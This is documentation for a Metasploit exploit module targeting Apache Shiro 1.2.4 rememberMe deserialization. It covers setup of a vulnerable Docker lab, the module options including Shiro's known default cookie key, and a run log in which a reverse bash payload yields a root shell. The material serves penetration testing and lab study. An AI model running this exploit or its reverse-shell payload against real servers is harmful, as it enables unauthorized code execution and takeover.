inkognitobo
c15d513766
The gadget chain was previously hardcoded to CommonsCollections2. Add a JAVA_GADGET_CHAIN OptEnum so operators can select the chain that matches the target's classpath without modifying the module. Default remains CommonsCollections2 to preserve existing behaviour.
3.4 KiB
Vulnerable Application
Description
Apache Shiro v1.2.4 is vulnerable to a Java deserialization vulnerability. An
unauthenticated user can submit a YSoSerial payload to the Apache Shiro web
server as the value to the rememberMe cookie. This will result in code
execution in the context of the web server.
The YSoSerial CommonsCollections2 payload is known to work and is the
default gadget chain used by this module. The gadget chain is configurable
via the JAVA_GADGET_CHAIN option; the selected chain must be available on
the target's classpath.
Note that other versions of Apache Shiro may also be exploitable if the
encryption key used by Shiro to encrypt rememberMe cookies is known.
Setup
You can use https://github.com/Medicean/VulApps/tree/master/s/shiro/1.
- Pull the docker image
docker pull medicean/vulapps:s_shiro_1
- Run the docker image, binding to port 8080
docker run --rm -p 8080:8080 medicean/vulapps:s_shiro_1
Verification Steps
use exploit/multi/http/shiro_rememberme_v124_deserializeset rhosts <rhost>run
Options
ENC_KEY
The encryption key the target Apache Shiro server is using to encrypt its rememberMe cookies.
JAVA_GADGET_CHAIN
The Java deserialization gadget chain to use. The chain must be available on the target's classpath.
Scenarios
Tested on GNU/Linux x86_64 using Shiro-1.2.4
msf > use exploit/multi/http/shiro_rememberme_v124_deserialize
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(multi/http/shiro_rememberme_v124_deserialize) > show options
Module options (exploit/multi/http/shiro_rememberme_v124_deserialize):
Name Current Setting Required Description
---- --------------- -------- -----------
ENC_KEY kPH+bIxk5D2deZiIxcaaaA== yes Shiro encryption key
JAVA_GADGET_CHAIN CommonsCollections2 yes The Java gadget chain to use for deserialization
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base directory path
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix Command payload
msf exploit(multi/http/shiro_rememberme_v124_deserialize) > set RHOSTS 172.18.0.2
RHOSTS => 172.18.0.2
msf exploit(multi/http/shiro_rememberme_v124_deserialize) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(multi/http/shiro_rememberme_v124_deserialize) > run
[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Command shell session 1 opened (172.18.0.1:4444 -> 172.18.0.2:60632) at 2020-12-21 17:09:27 -0600
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)